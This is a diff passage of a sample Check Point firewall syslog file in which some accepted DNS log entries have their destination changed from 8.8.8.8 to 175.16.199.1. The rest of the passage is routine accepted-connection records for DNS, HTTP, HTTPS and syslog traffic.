+<134>1 2020-03-29T18:20:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6ef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506031"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:20:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6ef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506031"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56970"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:20:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6f1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:20:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6f2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; 
src:"192.168.1.100"]
 <134>1 2020-03-29T18:20:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6f3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50732"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -3815,77 +3815,77 @@
 <134>1 2020-03-29T18:22:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e77a,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39154"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10210"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:22:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e77a,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47894"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:22:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e77a,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64224"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10211"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46692"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37261"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36806"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56003"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58189"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35644"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; 
outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46692"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37261"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36806"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56003"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58189"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35644"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44976"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35828"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59092"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35828"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506177"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59092"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:22:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e781,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53336"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:22:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e782,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; 
version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51744"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38746"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T18:22:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e783,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506179"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; 
